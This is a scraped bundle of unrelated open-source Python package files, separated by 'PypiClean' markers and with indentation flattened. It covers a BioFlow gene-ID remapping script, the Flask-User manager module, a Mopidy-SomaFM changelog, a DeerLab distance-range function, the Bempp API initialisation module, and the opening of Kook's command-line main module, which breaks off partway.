drawCandlestick( self.packet, f"{output}/{datestring}") | PypiClean |
/BioFlow-0.2.3.tar.gz/BioFlow-0.2.3/bioflow/utils/remap_IDs.py | from csv import reader as csv_reader
from csv import writer as csv_writer
high_conf_translation_dict = {}
low_conf_translation_dict = {}
genes_to_ids_dict = {}
# translation_file_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/Mouse_2_human.tsv'
# gene_to_id_file_location = ''
# data_source_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/both_ENSMUG.csv'
# data_dump_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/both_ENSHUM.csv'
translation_file_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/Mouse_2_human.tsv'
gene_to_id_file_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Kp_Km data/mouse_look_up_table.tsv'
data_source_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Kp_Km data/all_significant.csv'
data_dump_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Kp_Km data/all_sig_hum.csv'
with open(translation_file_location, 'r') as source:
reader = csv_reader(source, delimiter='\t')
print reader.next()
for line in reader:
if line[0] and line[1]:
if int(line[3]):
# We still need to account for the confidence in mapping
high_conf_translation_dict[line[0]] = [line[1], line[2]]
# print line[0:4]
else:
low_conf_translation_dict[line[0]] = [line[1], line[2]]
high_conf_trans = []
low_conf_trans = []
if gene_to_id_file_location:
with open(gene_to_id_file_location, 'r') as source:
reader = csv_reader(source, delimiter='\t')
print reader.next()
for line in reader:
genes_to_ids_dict[line[2]] = line[0]
with open(data_source_location, 'r') as source:
reader = csv_reader(source)
for i, line in enumerate(reader):
word = line[0]
if gene_to_id_file_location:
word = genes_to_ids_dict.get(word, 'None found')
if word in high_conf_translation_dict.keys():
high_conf_trans.append(high_conf_translation_dict[word])
if word in low_conf_translation_dict.keys():
low_conf_trans.append(low_conf_translation_dict[word])
print "out of %s, %s were translated with high confidence, %s with low and %s were not found" % \
(i, len(high_conf_trans), len(low_conf_trans), i-len(high_conf_trans)-len(low_conf_trans))
with open(data_dump_location, 'w') as destination:
writer = csv_writer(destination)
writer.writerows((word for word in high_conf_trans)) | PypiClean |
/Flask-User-pt-0.6.21.tar.gz/Flask-User-pt-0.6.21/flask_user/__init__.py | from passlib.context import CryptContext
from flask import Blueprint, current_app, url_for, render_template
from flask_login import LoginManager, UserMixin as LoginUserMixin
from flask_user.db_adapters import DBAdapter
from .db_adapters import SQLAlchemyAdapter
from . import emails
from . import forms
from . import passwords
from . import settings
from . import tokens
from . import translations
from . import views
from . import signals
from .translations import get_translations
# Enable the following: from flask_user import current_user
from flask_login import current_user
# Enable the following: from flask_user import login_required, roles_required
from .decorators import *
# Enable the following: from flask_user import user_logged_in
from .signals import *
__version__ = '0.6.21'
def _call_or_get(function_or_property):
return function_or_property() if callable(function_or_property) else function_or_property
def _flask_user_context_processor():
""" Make 'user_manager' available to Jinja2 templates"""
return dict(
user_manager=current_app.user_manager,
call_or_get=_call_or_get)
class UserManager(object):
""" This is the Flask-User object that manages the User management process."""
def __init__(self, db_adapter=None, app=None, **kwargs):
""" Create the UserManager object """
self.db_adapter = db_adapter
self.app = app
if db_adapter is not None and app is not None:
self.init_app(app, db_adapter, **kwargs)
def init_app(self, app, db_adapter=None,
# Forms
add_email_form=forms.AddEmailForm,
change_password_form=forms.ChangePasswordForm,
change_username_form=forms.ChangeUsernameForm,
forgot_password_form=forms.ForgotPasswordForm,
login_form=forms.LoginForm,
register_form=forms.RegisterForm,
resend_confirm_email_form=forms.ResendConfirmEmailForm,
reset_password_form=forms.ResetPasswordForm,
invite_form=forms.InviteForm,
# Validators
username_validator=forms.username_validator,
password_validator=forms.password_validator,
# View functions
render_function=render_template,
change_password_view_function=views.change_password,
change_username_view_function=views.change_username,
confirm_email_view_function=views.confirm_email,
email_action_view_function=views.email_action,
forgot_password_view_function=views.forgot_password,
login_view_function=views.login,
logout_view_function=views.logout,
manage_emails_view_function=views.manage_emails,
register_view_function=views.register,
resend_confirm_email_view_function = views.resend_confirm_email,
reset_password_view_function = views.reset_password,
unconfirmed_email_view_function = views.unconfirmed,
unauthenticated_view_function = views.unauthenticated,
unauthorized_view_function = views.unauthorized,
user_profile_view_function = views.user_profile,
invite_view_function = views.invite,
# Misc
login_manager=LoginManager(),
password_crypt_context=None,
send_email_function = emails.send_email,
make_safe_url_function = views.make_safe_url,
token_manager=tokens.TokenManager(),
legacy_check_password_hash=None
):
""" Initialize the UserManager object """
self.app = app
if db_adapter is not None:
self.db_adapter = db_adapter
# Forms
self.add_email_form = add_email_form
self.change_password_form = change_password_form
self.change_username_form = change_username_form
self.forgot_password_form = forgot_password_form
self.login_form = login_form
self.register_form = register_form
self.resend_confirm_email_form = resend_confirm_email_form
self.reset_password_form = reset_password_form
self.invite_form = invite_form
# Validators
self.username_validator = username_validator
self.password_validator = password_validator
# View functions
self.render_function = render_function
self.change_password_view_function = change_password_view_function
self.change_username_view_function = change_username_view_function
self.confirm_email_view_function = confirm_email_view_function
self.email_action_view_function = email_action_view_function
self.forgot_password_view_function = forgot_password_view_function
self.login_view_function = login_view_function
self.logout_view_function = logout_view_function
self.manage_emails_view_function = manage_emails_view_function
self.register_view_function = register_view_function
self.resend_confirm_email_view_function = resend_confirm_email_view_function
self.reset_password_view_function = reset_password_view_function
self.unconfirmed_email_view_function = unconfirmed_email_view_function
self.unauthenticated_view_function = unauthenticated_view_function
self.unauthorized_view_function = unauthorized_view_function
self.user_profile_view_function = user_profile_view_function
self.invite_view_function = invite_view_function
# Misc
self.login_manager = login_manager
self.token_manager = token_manager
self.password_crypt_context = password_crypt_context
self.send_email_function = send_email_function
self.make_safe_url_function = make_safe_url_function
self.legacy_check_password_hash = legacy_check_password_hash
""" Initialize app.user_manager."""
# Bind Flask-USER to app
app.user_manager = self
# Flask seems to also support the current_app.extensions[] list
if not hasattr(app, 'extensions'):
app.extensions = {}
app.extensions['user'] = self
# Set defaults for undefined settings
settings.set_default_settings(self, app.config)
# Make sure the settings are valid -- raise ConfigurationError if not
settings.check_settings(self)
# Initialize Translations -- Only if Flask-Babel has been installed
if hasattr(app.jinja_env, 'install_gettext_callables'):
app.jinja_env.install_gettext_callables(
lambda x: get_translations().ugettext(x),
lambda s, p, n: get_translations().ungettext(s, p, n),
newstyle=True)
else:
app.jinja_env.add_extension('jinja2.ext.i18n')
app.jinja_env.install_null_translations()
# Create password_crypt_context if needed
if not self.password_crypt_context:
self.password_crypt_context = CryptContext(
schemes=[app.config['USER_PASSWORD_HASH']])
# Setup Flask-Login
self.setup_login_manager(app)
# Setup TokenManager
self.token_manager.setup(app.config.get('SECRET_KEY'))
# Add flask_user/templates directory using a Blueprint
blueprint = Blueprint('flask_user', 'flask_user', template_folder='templates')
app.register_blueprint(blueprint)
# Add URL routes
self.add_url_routes(app)
# Add context processor
app.context_processor(_flask_user_context_processor)
# Prepare for translations
_ = translations.gettext
def setup_login_manager(self, app):
# Flask-Login calls this function to retrieve a User record by user ID.
# Note: user_id is a UNICODE string returned by UserMixin.get_id().
# See https://flask-login.readthedocs.org/en/latest/#how-it-works
@self.login_manager.user_loader
def load_user_by_id(user_unicode_id):
user_id = int(user_unicode_id)
#print('load_user_by_id: user_id=', user_id)
return self.get_user_by_id(user_id)
self.login_manager.login_view = 'user.login'
self.login_manager.init_app(app)
def add_url_routes(self, app):
""" Add URL Routes"""
app.add_url_rule(self.login_url, 'user.login', self.login_view_function, methods=['GET', 'POST'])
app.add_url_rule(self.logout_url, 'user.logout', self.logout_view_function, methods=['GET', 'POST'])
if self.enable_confirm_email:
app.add_url_rule(self.confirm_email_url, 'user.confirm_email', self.confirm_email_view_function)
app.add_url_rule(self.resend_confirm_email_url, 'user.resend_confirm_email', self.resend_confirm_email_view_function, methods=['GET', 'POST'])
if self.enable_change_password:
app.add_url_rule(self.change_password_url, 'user.change_password', self.change_password_view_function, methods=['GET', 'POST'])
if self.enable_change_username:
app.add_url_rule(self.change_username_url, 'user.change_username', self.change_username_view_function, methods=['GET', 'POST'])
if self.enable_forgot_password:
app.add_url_rule(self.forgot_password_url, 'user.forgot_password', self.forgot_password_view_function, methods=['GET', 'POST'])
app.add_url_rule(self.reset_password_url, 'user.reset_password', self.reset_password_view_function, methods=['GET', 'POST'])
if self.enable_register:
app.add_url_rule(self.register_url, 'user.register', self.register_view_function, methods=['GET', 'POST'])
if self.db_adapter.UserEmailClass:
app.add_url_rule(self.email_action_url, 'user.email_action', self.email_action_view_function)
app.add_url_rule(self.manage_emails_url, 'user.manage_emails', self.manage_emails_view_function, methods=['GET', 'POST'])
app.add_url_rule(self.user_profile_url, 'user.profile', self.user_profile_view_function, methods=['GET', 'POST'])
if self.enable_invitation:
app.add_url_rule(self.invite_url, 'user.invite', self.invite_view_function, methods=['GET', 'POST'])
# Obsoleted function. Replace with hash_password()
def generate_password_hash(self, password):
return passwords.hash_password(self, password)
def hash_password(self, password):
return passwords.hash_password(self, password)
def get_password(self, user):
use_auth_class = True if self.db_adapter.UserAuthClass and hasattr(user, 'user_auth') else False
# Handle v0.5 backward compatibility
if self.db_adapter.UserProfileClass:
hashed_password = user.password
else:
hashed_password = user.user_auth.password if use_auth_class else user.password
return hashed_password
def update_password(self, user, hashed_password):
use_auth_class = True if self.db_adapter.UserAuthClass and hasattr(user, 'user_auth') else False
if use_auth_class:
user.user_auth.password = hashed_password
else:
user.password = hashed_password
self.db_adapter.commit()
def verify_password(self, password, user):
"""
Make it backward compatible to legacy password hash.
In addition, if such password were found, update the user's password field.
"""
verified = False
hashed_password = self.get_password(user)
try:
verified = passwords.verify_password(self, password, hashed_password)
except ValueError:
legacy_check = self.legacy_check_password_hash
if legacy_check:
verified = legacy_check(hashed_password, password)
if verified:
# update the hash
new_hash = self.hash_password(password)
self.update_password(user, new_hash)
return verified
def generate_token(self, user_id):
return self.token_manager.generate_token(user_id)
def verify_token(self, token, expiration_in_seconds):
return self.token_manager.verify_token(token, expiration_in_seconds)
def get_user_by_id(self, user_id):
# Handle v0.5 backward compatibility
ObjectClass = self.db_adapter.UserAuthClass if self.db_adapter.UserAuthClass and self.db_adapter.UserProfileClass else self.db_adapter.UserClass
return self.db_adapter.get_object(ObjectClass, user_id)
# NB: This backward compatibility function may be obsoleted in the future
# Use 'get_user_by_id() instead.
def find_user_by_id(self, user_id):
print('Warning: find_user_by_id() will be deprecated in the future. User get_user_by_id() instead.')
return self.get_user_by_id(user_id)
def get_user_email_by_id(self, user_email_id):
return self.db_adapter.get_object(self.db_adapter.UserEmailClass, user_email_id)
# NB: This backward compatibility function may be obsoleted in the future
# Use 'get_user_email_by_id() instead.
def find_user_email_by_id(self, user_email_id):
print('Warning: find_user_email_by_id() will be deprecated in the future. User get_user_email_by_id() instead.')
return self.get_user_email_by_id(user_email_id)
def find_user_by_username(self, username):
user_auth = None
# The username field can either be in the UserAuth class or in the User class
if self.db_adapter.UserAuthClass and hasattr(self.db_adapter.UserAuthClass, 'username'):
user_auth = self.db_adapter.ifind_first_object(self.db_adapter.UserAuthClass, username=username)
# Handle v0.5 backward compatibility
if self.db_adapter.UserProfileClass: return user_auth
user = user_auth.user if user_auth else None
else:
user = self.db_adapter.ifind_first_object(self.db_adapter.UserClass, username=username)
return user
def find_user_by_email(self, email):
user_email = None
user_auth = None
if self.db_adapter.UserEmailClass:
user_email = self.db_adapter.ifind_first_object(self.db_adapter.UserEmailClass, email=email)
user = user_email.user if user_email else None
else:
# The email field can either be in the UserAuth class or in the User class
if self.db_adapter.UserAuthClass and hasattr(self.db_adapter.UserAuthClass, 'email'):
user_auth = self.db_adapter.ifind_first_object(self.db_adapter.UserAuthClass, email=email)
# Handle v0.5 backward compatibility
if self.db_adapter.UserProfileClass: return (user_auth, user_email)
user = user_auth.user if user_auth else None
else:
user = self.db_adapter.ifind_first_object(self.db_adapter.UserClass, email=email)
return (user, user_email)
def email_is_available(self, new_email):
""" Return True if new_email does not exist.
Return False otherwise."""
user, user_email = self.find_user_by_email(new_email)
return (user==None)
def username_is_available(self, new_username):
""" Return True if new_username does not exist or if new_username equals old_username.
Return False otherwise."""
# Allow user to change username to the current username
if _call_or_get(current_user.is_authenticated):
current_username = current_user.user_auth.username if self.db_adapter.UserAuthClass and hasattr(current_user, 'user_auth') else current_user.username
if new_username == current_username:
return True
# See if new_username is available
return self.find_user_by_username(new_username)==None
def send_reset_password_email(self, email):
# Find user by email
user, user_email = self.find_user_by_email(email)
if user:
# Generate reset password link
token = self.generate_token(int(user.get_id()))
reset_password_link = url_for('user.reset_password', token=token, _external=True)
# Send forgot password email
emails.send_forgot_password_email(user, user_email, reset_password_link)
# Send forgot_password signal
signals.user_forgot_password.send(current_app._get_current_object(), user=user)
class UserMixin(LoginUserMixin):
""" This class adds methods to the User model class required by Flask-Login and Flask-User."""
def is_active(self):
if hasattr(self, 'active'):
return self.active
else:
return self.is_enabled
def set_active(self, active):
if hasattr(self, 'active'):
self.active = active
else:
self.is_enabled = active
def has_role(self, *specified_role_names):
""" Return True if the user has one of the specified roles. Return False otherwise.
has_roles() accepts a 1 or more role name parameters
has_role(role_name1, role_name2, role_name3).
For example:
has_roles('a', 'b')
Translates to:
User has role 'a' OR role 'b'
"""
# Allow developers to attach the Roles to the User or the UserProfile object
if hasattr(self, 'roles'):
roles = self.roles
else:
if hasattr(self, 'user_profile') and hasattr(self.user_profile, 'roles'):
roles = self.user_profile.roles
else:
roles = None
if not roles: return False
# Translates a list of role objects to a list of role_names
user_role_names = [role.name for role in roles]
# Return True if one of the role_names matches
for role_name in specified_role_names:
if role_name in user_role_names:
return True
# Return False if none of the role_names matches
return False
def has_roles(self, *requirements):
""" Return True if the user has all of the specified roles. Return False otherwise.
has_roles() accepts a list of requirements:
has_role(requirement1, requirement2, requirement3).
Each requirement is either a role_name, or a tuple_of_role_names.
role_name example: 'manager'
tuple_of_role_names: ('funny', 'witty', 'hilarious')
A role_name-requirement is accepted when the user has this role.
A tuple_of_role_names-requirement is accepted when the user has ONE of these roles.
has_roles() returns true if ALL of the requirements have been accepted.
For example:
has_roles('a', ('b', 'c'), d)
Translates to:
User has role 'a' AND (role 'b' OR role 'c') AND role 'd'"""
# Allow developers to attach the Roles to the User or the UserProfile object
if hasattr(self, 'roles'):
roles = self.roles
else:
if hasattr(self, 'user_profile') and hasattr(self.user_profile, 'roles'):
roles = self.user_profile.roles
else:
roles = None
if not roles: return False
# Translates a list of role objects to a list of role_names
user_role_names = [role.name for role in roles]
# has_role() accepts a list of requirements
for requirement in requirements:
if isinstance(requirement, (list, tuple)):
# this is a tuple_of_role_names requirement
tuple_of_role_names = requirement
authorized = False
for role_name in tuple_of_role_names:
if role_name in user_role_names:
# tuple_of_role_names requirement was met: break out of loop
authorized = True
break
if not authorized:
return False # tuple_of_role_names requirement failed: return False
else:
# this is a role_name requirement
role_name = requirement
# the user must have this role
if not role_name in user_role_names:
return False # role_name requirement failed: return False
# All requirements have been met: return True
return True
# Flask-Login is capable of remembering the current user ID in the browser's session.
# This function enables the user ID to be encrypted as a token.
# See https://flask-login.readthedocs.org/en/latest/#remember-me
def get_auth_token(self):
token_manager = current_app.user_manager.token_manager
user_id = int(self.get_id())
token = token_manager.encrypt_id(user_id)
#print('get_auth_token: user_id=', user_id, 'token=', token)
return token
def has_confirmed_email(self):
db_adapter = current_app.user_manager.db_adapter
# Handle multiple emails per user: Find at least one confirmed email
if db_adapter.UserEmailClass:
has_confirmed_email = False
user_emails = db_adapter.find_all_objects(db_adapter.UserEmailClass, user_id=self.id)
for user_email in user_emails:
if user_email.confirmed_at:
has_confirmed_email = True
break
# Handle single email per user
else:
has_confirmed_email = True if self.confirmed_at else False
return has_confirmed_email | PypiClean |
/Mopidy-SomaFM-2.0.2.tar.gz/Mopidy-SomaFM-2.0.2/CHANGES.rst | Changelog
=========
v2.0.2 (2021-02-10)
-------------------
- #40 Fix exception on URI parsing
v2.0.1 (2021-01-07)
-------------------
- #37 Fix image display (Thanks to @dreamlayers and @morithil)
v2.0.0 (2020-03-11)
-------------------
- #36 Ready for Mopidy 3.0
v2.0.0rc1 (2019-12-04)
----------------------
- #32 Migrate to Python 3.7
v1.1.0 (2017-10-14)
-------------------
- #24: Graceful fallback
- #28: Various fix (DJ as artist, station ordering)
v1.0.1 (2016-01-19)
-------------------
- Use httpclient helper from Mopidy >= 1.1
v0.8.0 (2015-11-09)
-------------------
- #20: Replace HTTP with HTTPS for channels.xml
v0.7.1 (2015-01-04)
-------------------
- #11: Add Low Bitrate encoding (aacp)
v0.7.0 (2014-07-29)
-------------------
- #10: Remove playlists provider
v0.6.0 (2014-03-15)
-------------------
- Directly show PLS in browser
- Add precision about 'quality' and 'encoding' couple
v0.5.1 (2014-03-09)
-------------------
- Fix doc typo
v0.5.0 (2014-03-03)
-------------------
- #5: Select prefered quality and format from config
- Add tests and Travis-CI support
v0.4.0 (2014-02-16)
-------------------
- Add browse support for LibraryController
v0.3.1 (2014-01-30)
-------------------
- #3: Correct wrong subclassing
v0.3.0 (2014-01-29)
-------------------
- Require Mopidy >= 0.18
- Add proxy support for downloading SomaFM content
- #1: handle 'requests' exceptions
- Use builtin Mopidy's .pls support
- Internal code cleanup
v0.2.0 (2013-09-22)
-------------------
- PLS files are downloaded to local temp directory
- Implement library::lookup to allow adding tracks from playlist uri
v0.1.1 (2013-09-14)
-------------------
- Update Licence information
v0.1.0 (2013-09-13)
-------------------
- Initial release
- Create SomaFM extension for Mopidy
| PypiClean |
/DeerLab-1.1.1.tar.gz/DeerLab-1.1.1/deerlab/distancerange.py | import numpy as np
def distancerange(t, nr=None):
r"""
Empirical distance range given a dipolar EPR experiment time axis
This function calculates the empirical distance range for a DEER time axis.
The distance range is determined by the time step and the Nyquist criterion
for the minimum distance, and by the requirement that at least half an
oscillation should be observable over the measured time window for the
maximum distance. The function allows to specify the length of the output
distance axis. If not given, only the minimum and maximum distances are returned.
Parameters
----------
t : array_like
Time axis, in microseconds. The time points at which the dipolar signal was measured.
nr : scalar, integer
Length of output distance axis. If not given, only min and max distance are returned.
Returns
-------
r : ndarray or tuple
Distance axis, in nanometers, running between empirical lower and upper limits ``rmin`` and ``rmax``.
Either an ndarray ``r`` (if ``nr`` is given) or a tuple ``(rmin,rmax)`` (if ``nr`` is not given).
Notes
-----
The minimal and maximal distances, ``rmin`` and ``rmax``, are empirical values that determine the
minimal and maximal distance for which the given time trace can provide reliable information.
The minimum distance is determined by the time step :math:`\Delta t` and the Nyquist criterion:
.. math::
r_\text{min} = \left( \frac{4\Delta t \nu_0}{0.85} \right)^{1/3}
The maximum distance is determined by the requirement that at least half an oscillation
should be observable over the measured time window from :math:`t_\text{min}`
to :math:`t_\text{max}`.
.. math::
r_\text{max} = 6\left( \frac{t_\text{max}-t_\text{min}}{2} \right)^{1/3}
where :math:`\nu_0` = 52.04 MHz nm^3.
See Jeschke et al, Appl. Magn. Reson. 30, 473-498 (2006), https://doi.org/10.1007/BF03166213
"""
t = np.atleast_1d(t)
D = 52.04 # MHz nm^3
# Minimum distance is determined by maximum frequency detectable with
# the given time increment, based on Nyquist
dt = np.mean(np.diff(t)) # time increment
nupara_max = 1/2/dt # maximum parallel dipolar frequency (Nyquist)
nu_max = nupara_max/2 # maximum perpendicular dipolar frequency
nu_max = nu_max*0.85 # add a bit of buffer
rmin = (D/nu_max)**(1/3)
# At least half a period of the oscillation
# should be observable in the time window.
trange = np.max(t) - np.min(t)
Tmax = trange*2 # maximum period length
rmax = (D*Tmax)**(1/3)
if nr is not None:
r = np.linspace(rmin, rmax, nr)
else:
r = (rmin, rmax)
return r | PypiClean |
/Bempp-cl-0.3.1.tar.gz/Bempp-cl-0.3.1/bempp/api/__init__.py |
# # Monkey patch Numba to emit log messages when compiling
# import numba
# oldcompile = numba.core.registry.CPUDispatcher.compile
# def compile_with_log(*args, **kwargs):
# """Numba compilation with log messages."""
# import bempp.api
# fun_name = args[0].py_func.__name__
# bempp.api.log(f"Compiling {fun_name} for signature {args[1]}.", level="debug")
# res = oldcompile(*args, **kwargs)
# bempp.api.log(f"Compilation finished.", level="debug")
# return res
# numba.core.registry.CPUDispatcher.compile = compile_with_log
import os as _os
import tempfile as _tempfile
import logging as _logging
import time as _time
import platform as _platform
from bempp.api.utils import DefaultParameters
from bempp.api.utils.helpers import MemProfiler
from bempp.api.utils.helpers import assign_parameters
from bempp.api.grid.io import import_grid
from bempp.api.grid.io import export
from bempp.api.grid.grid import Grid
from bempp.api.assembly.grid_function import GridFunction
from bempp.api.assembly.grid_function import real_callable
from bempp.api.assembly.grid_function import complex_callable
from bempp.api.assembly.grid_function import callable
from bempp.api.space import function_space
from bempp.api import shapes
from bempp.api import integration
from bempp.api import operators
from bempp.api.linalg.direct_solvers import lu, compute_lu_factors
from bempp.api.linalg.iterative_solvers import gmres, cg
from bempp.api.assembly.discrete_boundary_operator import as_matrix
from bempp.api.assembly.boundary_operator import ZeroBoundaryOperator
from bempp.api.assembly.boundary_operator import MultiplicationOperator
from bempp.api.assembly.blocked_operator import BlockedOperator
from bempp.api.assembly.blocked_operator import GeneralizedBlockedOperator
from bempp.api.fmm.fmm_assembler import clear_fmm_cache
from bempp.api.utils import pool
from bempp.api.utils.pool import create_device_pool
from numba.core.errors import (
NumbaDeprecationWarning,
NumbaPendingDeprecationWarning,
NumbaPerformanceWarning,
)
import warnings
warnings.simplefilter("ignore", category=NumbaDeprecationWarning)
warnings.simplefilter("ignore", category=NumbaPendingDeprecationWarning)
warnings.simplefilter("ignore", category=NumbaPerformanceWarning)
warnings.filterwarnings("ignore", message="splu requires CSC matrix format")
## Try importing OpenCL routines
try:
from bempp.core.opencl_kernels import set_default_cpu_device
from bempp.core.opencl_kernels import set_default_cpu_device_by_name
from bempp.core.opencl_kernels import set_default_gpu_device_by_name
from bempp.core.opencl_kernels import set_default_gpu_device
except:
pass
CONSOLE_LOGGING_HANDLER = None
DEFAULT_LOGGING_FORMAT = "%(name)s:%(levelname)s: %(message)s"
DEBUG = _logging.DEBUG
TIMING = 11
INFO = _logging.INFO
WARNING = _logging.WARNING
ERROR = _logging.ERROR
CRITICAL = _logging.CRITICAL
LOG_LEVEL = {
"debug": DEBUG,
"timing": TIMING,
"info": INFO,
"warning": WARNING,
"error": ERROR,
"critical": CRITICAL,
}
GLOBAL_PARAMETERS = DefaultParameters()
def _init_logger():
"""Initialize the Bempp logger."""
_logging.addLevelName(11, "TIMING")
logger = _logging.getLogger("bempp")
logger.setLevel(DEBUG)
logger.addHandler(_logging.NullHandler())
return logger
def log(message, level="info", flush=True):
"""Log including default flushing for IPython."""
LOGGER.log(LOG_LEVEL[level], message)
if flush:
flush_log()
def flush_log():
"""Flush all handlers. Necessary for Jupyter."""
for handler in LOGGER.handlers:
handler.flush()
def enable_console_logging(level="info"):
"""Enable console logging and return the console handler."""
from bempp.api.utils import pool
# pylint: disable=W0603
global CONSOLE_LOGGING_HANDLER
if not CONSOLE_LOGGING_HANDLER:
console_handler = _logging.StreamHandler()
console_handler.setLevel(LOG_LEVEL[level])
if pool.is_worker():
console_handler.setFormatter(
_logging.Formatter(
f"%(name)s:PROC{pool._MY_ID}:%(levelname)s: %(message)s", "%H:%M:%S"
)
)
else:
console_handler.setFormatter(
_logging.Formatter(
"%(name)s:HOST:%(levelname)s: %(message)s", "%H:%M:%S"
)
)
LOGGER.addHandler(console_handler)
CONSOLE_LOGGING_HANDLER = console_handler
return CONSOLE_LOGGING_HANDLER
# def enable_file_logging(file_name, level=DEBUG, logging_format=DEFAULT_LOGGING_FORMAT):
# """Enable logging to a specific file."""
# file_handler = _logging.FileHandler(file_name)
# file_handler.setLevel(level)
# file_handler.setFormatter(_logging.Formatter(logging_format, "%H:%M:%S"))
# LOGGER.addHandler(file_handler)
# return file_handler
def set_logging_level(level):
"""Set the logging level."""
LOGGER.setLevel(LOG_LEVEL[level])
# pylint: disable=too-few-public-methods
class Timer:
"""Context manager to measure time in Bempp."""
def __init__(self, enable_log=True, message="", level="timing"):
"""Construct."""
self.start = 0
self.end = 0
self.interval = 0
self.enable_log = enable_log
self.level = level
self.message = message
def __enter__(self):
"""Enter."""
if self.enable_log:
log("Start operation: " + self.message, level=self.level)
self.start = _time.time()
return self
def __exit__(self, *args):
"""Exit."""
self.end = _time.time()
self.interval = self.end - self.start
if self.enable_log:
log(
"Finished Operation: " + self.message + f": {self.interval}s",
level=self.level,
)
LOGGER = _init_logger()
BEMPP_PATH = _os.path.abspath(
_os.path.join(_os.path.dirname(_os.path.realpath(__file__)), "..")
)
# pylint: disable=W0702
# try:
# if _os.environ['BEMPP_CONSOLE_LOGGING'] == '1':
# enable_console_logging()
# except:
# pass
TMP_PATH = _tempfile.mkdtemp()
# Get the path to Gmsh
def _gmsh_path():
"""Find Gmsh."""
from bempp.api.utils import which
if _os.name == "nt":
gmp = which("gmsh.exe")
if gmp is None:
gmp = which("gmsh")
else:
gmp = which("gmsh")
if gmp is None:
print(
"Could not find Gmsh."
+ "Interactive plotting and shapes module not available."
)
return gmp
def check_for_fmm():
"""Return true of compatible FMM found."""
exafmm_found = False
try:
import exafmm
except:
exafmm_found = False
else:
exafmm_found = True
return exafmm_found
def _get_version():
"""Get version string."""
from bempp import version
return version.__version__
GMSH_PATH = _gmsh_path()
__version__ = _get_version()
PLOT_BACKEND = "gmsh"
try:
ipy = get_ipython()
if ipy.__class__.__name__ == "ZMQInteractiveShell":
# We are in a jupyter notebook, so change plotting backend
PLOT_BACKEND = "jupyter_notebook"
except NameError:
pass
USE_JIT = True
CPU_OPENCL_DRIVER_FOUND = False
GPU_OPENCL_DRIVER_FOUND = False
if _platform.system() == "Darwin":
DEFAULT_DEVICE_INTERFACE = "numba"
else:
try:
from bempp.core.opencl_kernels import find_cpu_driver
CPU_OPENCL_DRIVER_FOUND = find_cpu_driver()
except:
pass
try:
from bempp.core.opencl_kernels import find_gpu_driver
GPU_OPENCL_DRIVER_FOUND = find_gpu_driver()
except:
pass
if CPU_OPENCL_DRIVER_FOUND:
DEFAULT_DEVICE_INTERFACE = "opencl"
else:
DEFAULT_DEVICE_INTERFACE = "numba"
if DEFAULT_DEVICE_INTERFACE == "numba":
log(
"Numba backend activated. For full performance the OpenCL backend with an OpenCL CPU driver is required."
)
DEFAULT_PRECISION = "double"
VECTORIZATION_MODE = "auto"
BOUNDARY_OPERATOR_DEVICE_TYPE = "cpu"
POTENTIAL_OPERATOR_DEVICE_TYPE = "cpu"
ALL = -1 # Useful global identifier | PypiClean |
/Kook-0.7.2.tar.gz/Kook-0.7.2/lib/kook/main.py |
###
### $Release: 0.7.2 $
### $Copyright: copyright(c) 2008-2012 kuwata-lab.com all rights reserved. $
### $License: MIT License $
###
__all__ = ('MainObject', 'MainCommand', 'MainApplication')
import sys, os, re
import kook
from kook import KookCommandError, KookRecipeError, __RELEASE__
from kook.cookbook import Cookbook
from kook.kitchen import Kitchen
import kook.config as config
from kook.utils import CommandOptionParser, CommandOptionError, read_file, str2int
class MainObject(object):
def __init__(self, argv=None):
if argv is None: argv = sys.argv
self.command = os.path.basename(argv[0])
self.args = argv[1:]
def invoke(self):
raise NotImplementedError("%s#invoke(): not implemented yet." % self.__class__.__name__)
def main(self):
raise NotImplementedError("%s#main(): not implemented yet." % self.__class__.__name__)
def _load_property_file(self, filename=None):
if filename is None:
filename = config.properties_filename
props = {}
if os.path.isfile(filename):
content = read_file(filename)
#exec content in props, props
exec(content, props, props)
for name in list(props.keys()):
if not re.match(r'^[a-zA-Z]', name):
del props[name]
return props
TIPS = [
"you can set 'kookbook.default=\"XXX\"' in your kookbook.",
"you can override properties with '--propname=propvalue'.",
"it is able to separate properties into 'Properties.py' file.",
"try 'kk' command which is shortcat for 'pykook' command.",
"'@ingreds(\"$(1).c\", if_exists(\"$(1).h\"))' is a friend of C programmer.",
"'c%\"gcc $(ingred)\"' is more natural than '\"gcc %s\" % c.ingreds[0]'.",
]
class MainCommand(MainObject):
optdef_strs = (
"-h: help",
#"--help: help",
"-V: version",
"-D[N]: debug level (default: 1)",
"-q: quiet",
"-f file: kookbook",
"-F: run forcedly (ignore timestamps)",
"-n: not execute (dry run)",
"-l: list public recipes",
"-L: list all recipes",
"-R: search parent directory recursively for Kookbook",
"--name=value: property name and value",
"--name: property name and value(=True)",
)
def invoke(self):
## parse command-line options
optparser = CommandOptionParser(self.optdef_strs)
opts, longopts, rests = optparser.parse2(self.args, command=self.command)
#print "*** debug: command option: opts=%s, longopts=%s, rests=%s" % (repr(opts), repr(longopts), repr(rests))
## handle options
if opts.get('h') or longopts.get('help') is True:
sys.stdout.write("%s - build tool like Make, Rake, Ant, or Cook\n" % self.command)
sys.stdout.write(optparser.help())
return 0
if opts.get('V'):
sys.stdout.write(__RELEASE__ + "\n")
return 0
if opts.get('q'): config.quiet = True
if opts.get('F'): config.forced = True
if opts.get('n'): config.noexec = True
if opts.get('D'):
v = str2int(opts['D']) # notice that int(True) is 1
if v is None:
raise CommandOptionError('-D%s: integer is required.' % opts['D'])
config.debug_level = v
## find cookbook
bookname = opts.get('f', config.cookbook_filename)
bookpath = bookname
if opts.get('R'):
abspath = os.path.abspath
while not os.path.exists(bookpath):
parent = os.path.join("..", bookpath)
if abspath(parent) == abspath(bookpath): break
bookpath = parent
s = opts.get('f') and '-f ' or ''
if not os.path.exists(bookpath):
raise CommandOptionError('%s%s: not found.' % (s, bookname))
if not os.path.isfile(bookpath):
raise CommandOptionError('%s%s: not a file.' % (s, bookname))
## change directory if cookbook is in parent directory
if bookname != bookpath:
path = bookpath[:-len(bookname)]
os.chdir(path)
## property file
props = self._load_property_file()
if longopts:
props.update(longopts)
## create cookbook
